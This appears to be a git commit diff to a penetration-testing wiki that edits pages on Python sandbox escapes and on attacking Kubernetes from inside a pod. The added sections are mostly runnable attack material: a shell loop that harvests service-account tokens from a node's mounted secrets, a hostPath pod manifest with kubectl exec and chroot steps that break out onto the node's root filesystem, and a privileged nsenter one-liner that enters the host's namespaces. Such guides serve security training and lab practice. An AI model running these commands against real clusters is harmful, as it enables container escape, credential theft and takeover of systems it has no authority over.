GitBook: [#2911] No subject

2024-11-21 20:23:18 +00:00 · 2021-12-23 12:20:46 +00:00 · 2021-12-23 12:20:46 +00:00 · 8a0c6374c5
commit 8a0c6374c5
parent 086406e0d1
5 changed files with 98 additions and 36 deletions
--- a/misc/basic-python/bypass-python-sandboxes/README.md
+++ b/misc/basic-python/bypass-python-sandboxes/README.md
@ -830,31 +830,7 @@ f(42)
 ## Decompiling Compiled Python
-Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code.
+Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code
 **Check out this tutorial**:
 {% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
 [.pyc.md](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
 {% endcontent-ref %}
 ## Misc Python
 ### Assert
 Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\
 Therefore, checks like
 ```python
 def check_permission(super_user):
    try:
        assert(super_user)
        print("\nYou are a super user\n")
    except AssertionError:
        print(f"\nNot a Super User!!!\n")
 ```
 will be bypassed&#x20;
 ## References
@ -863,4 +839,3 @@ will be bypassed&#x20;
 * [https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/](https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/)
 * [https://gynvael.coldwind.pl/n/python\_sandbox\_escape](https://gynvael.coldwind.pl/n/python\_sandbox\_escape)
 * [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html)
 * [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6)
--- a/pentesting/pentesting-kubernetes/README.md
+++ b/pentesting/pentesting-kubernetes/README.md
@ -48,3 +48,7 @@ Another important details about enumeration and Kubernetes permissions abuse is
 [hardening-roles-clusterroles.md](hardening-roles-clusterroles.md)
 {% endcontent-ref %}
 ## Labs to practice and learn
 * [https://securekubernetes.com/](https://securekubernetes.com)
 * [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html)
--- a/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md
+++ b/pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md
@ -20,14 +20,6 @@ You can check this **docker breakouts to try to escape** from a pod you have com
 [docker-breakout](../../linux-unix/privilege-escalation/docker-breakout/)
 {% endcontent-ref %}
 If you managed to escape from the container there are some interesting things you will find in the node:
 * The **Kubelet** service listening
 * The **Kube-Proxy** service listening
 * The **Container Runtime** process (Docker)
 * More **pods/containers** running in the node you can abuse like this one (more tokens)
 * The whole **filesystem** and **OS** in general
 ### Abusing Kubernetes Privileges
 As explained in the section about **kubernetes enumeration**:
@ -94,3 +86,34 @@ In case the **compromised pod is running some sensitive service** where other po
 ## Automatic Tools
 * [https://github.com/inguardians/peirates](https://github.com/inguardians/peirates)
 ## Node Post-Exploitation
 If you managed to **escape from the container** there are some interesting things you will find in the node:
 * The **Container Runtime** process (Docker)
 * More **pods/containers** running in the node you can abuse like this one (more tokens)
 * The whole **filesystem** and **OS** in general
 * The **Kube-Proxy** service listening
 * The **Kubelet** service listening: Check `/var/lib/kubelet/` specially `/var/lib/kubelet/kubeconfig`
 ```bash
 # Check Kubelet privileges
 kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system
 # Steal the tokens from the pods running in the node
 ## The most interesting one is probably the one of kube-system
 ALREADY="IinItialVaaluE"
 for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
    TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
    if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then
        ALREADY="$ALREADY|$TOKEN"
        echo "Directory: $i"
        echo "Namespace: $(cat $i)"
        echo ""
        echo $TOKEN
        echo "================================================================================"
        echo ""
    fi
 done
 ```
--- a/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md
+++ b/pentesting/pentesting-kubernetes/enumeration-from-a-pod.md
@ -377,7 +377,15 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/batch/v1bet
 {% endtab %}
 {% endtabs %}
-****
+### **Get Pods consumptions**
 {% tabs %}
 {% tab title="kubectl" %}
 ```
 ./kubectl top pod --all-namespaces
 ```
 {% endtab %}
 {% endtabs %}
 ### Escaping from the pod
--- a/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md
+++ b/pentesting/pentesting-kubernetes/hardening-roles-clusterroles.md
@ -91,7 +91,7 @@ So just create the malicious pod and expect the secrets in port 6666:
 ![](<../../.gitbook/assets/image (464).png>)
-### **Pod Creation - Mount Root (pod escape)**
+### **Pod Creation & Escape - Mount Root**
 Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one:
@ -125,6 +125,58 @@ kubectl --token $token create -f mount_root.yaml
 And capturing the reverse shell you can find the `/` directory (the entire filesystem) of the node mounted in `/mnt` inside the pod.
 **Instead of getting a reverse shell you might just wanto to execute a pod using kubectl with the filesystem mounted and get a shell on it:**
 1.  Create a "hostpath volume mount" `pod` manifest.
    ```
    cat > hostpath.yml <<EOF
    ---
    apiVersion: v1
    kind: Pod
    metadata:
      name: hostpath
    spec:
      containers:
      - name: hostpath
        image: busybox:latest
        command:
          - sleep
          - "86400"
        volumeMounts:
          - name: rootfs
            mountPath: /rootfs
      restartPolicy: Always
      volumes:
        - name: rootfs
          hostPath:
            path: /
    EOF
    ```
 2.  Create the `pod` that mounts the host filesystem's `/` at `/rootfs` inside the container.
    ```
    kubectl apply -f hostpath.yml
    ```
 3.  Use `kubectl exec` to get a shell inside the `hostpath` `pod` in the `default` `namespace`.
    ```
    kubectl exec -it hostpath /bin/sh
    ```
 4.  Use the `chroot` command to switch the filesystem root to the `/rootfs` of the container and run a `bash` shell.
    ```
    chroot /rootfs /bin/bash
    ```
 ### Pod Creation & Escape -  Get into root pid ns
 From [this tweet](https://twitter.com/mauilion/status/1129468485480751104) you can find a way to escape from the pod and get inside the root ns
 ```bash
 kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'
 ```
 ### Sniffing **with a sidecar proxy app**
 By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.